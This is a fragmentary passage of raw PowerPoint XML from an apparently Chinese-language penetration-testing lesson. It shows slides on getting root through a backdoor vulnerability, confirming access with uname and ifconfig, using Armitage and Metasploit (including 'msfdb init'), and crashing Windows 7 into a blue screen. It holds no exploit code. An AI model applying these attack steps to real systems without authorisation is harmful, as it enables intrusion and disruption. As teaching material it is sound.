              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后门漏洞，获取目标主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>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1318" y="3233958"/>
            <a:ext cx="9155898" cy="2089604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{876AFA25-06BC-4DC4-D1A3-311F112EEF03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571507" y="5984329"/>
            <a:ext cx="9987934" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> –a:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示系统名、节点名称、操作系统的发行版号、内核版本等等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3032020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803" y="1168945"/>
            <a:ext cx="11058803" cy="4663143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A2BECC-17B3-DE10-5CAF-418E2BE7D8DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84222" y="22188"/>
            <a:ext cx="3115710" cy="817056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15621630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35B156A-AF07-2545-7E2B-C6E870E64D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830580" y="2144394"/>
            <a:ext cx="10530840" cy="3350854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Armitage是一款图形化的Metasploit界面，它的原理是基于Metasploit框架，通过快速生成、执行各种攻击模块来进行渗透测试或攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提供的各种攻击模块，可以对目标主机进行扫描、漏洞检测、漏洞利用、提权等各种攻击操作。用户只需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图形界面中选择想要的模块，就能快速生成一个针对目标主机的攻击任务，并且可以实时查看攻击结果。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4244D55D-23B5-5CF9-89A4-FD12E9290DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="337539" y="1011954"/>
            <a:ext cx="10193338" cy="7175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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>界面实现攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="180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50500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357" y="1687354"/>
            <a:ext cx="2893671" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>● </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：预配置模块。用户可以在模块列表中使用空格键搜索提供的模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>● </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：显示活跃的目标系统，用户能执行利用攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>● </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：显示多个标签。可以运行多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令或控制台会话，并且同时显示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF7D158-FA15-49AD-EC5B-52155B40A7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="337539" y="1011954"/>
            <a:ext cx="10193338" cy="7175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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>界面实现攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="1800">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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1028" y="1989085"/>
            <a:ext cx="9290972" cy="4662232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC264B4D-0E19-3037-FD31-0307F0260765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6213507" y="1267839"/>
            <a:ext cx="7903922" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>启动前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>初始化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>数据库 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16637044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8F75D4C-0BA9-488F-B84B-6839B8DE3C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047102" y="1072901"/>
            <a:ext cx="8571293" cy="5459278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C646DEB-FC87-AD8F-C6BF-DE9D73633B4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314465" y="1589330"/>
            <a:ext cx="2165977" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>win7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>蓝屏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7749624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7F2EAF9-BA58-B1D3-0E07-DB789C3C5680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
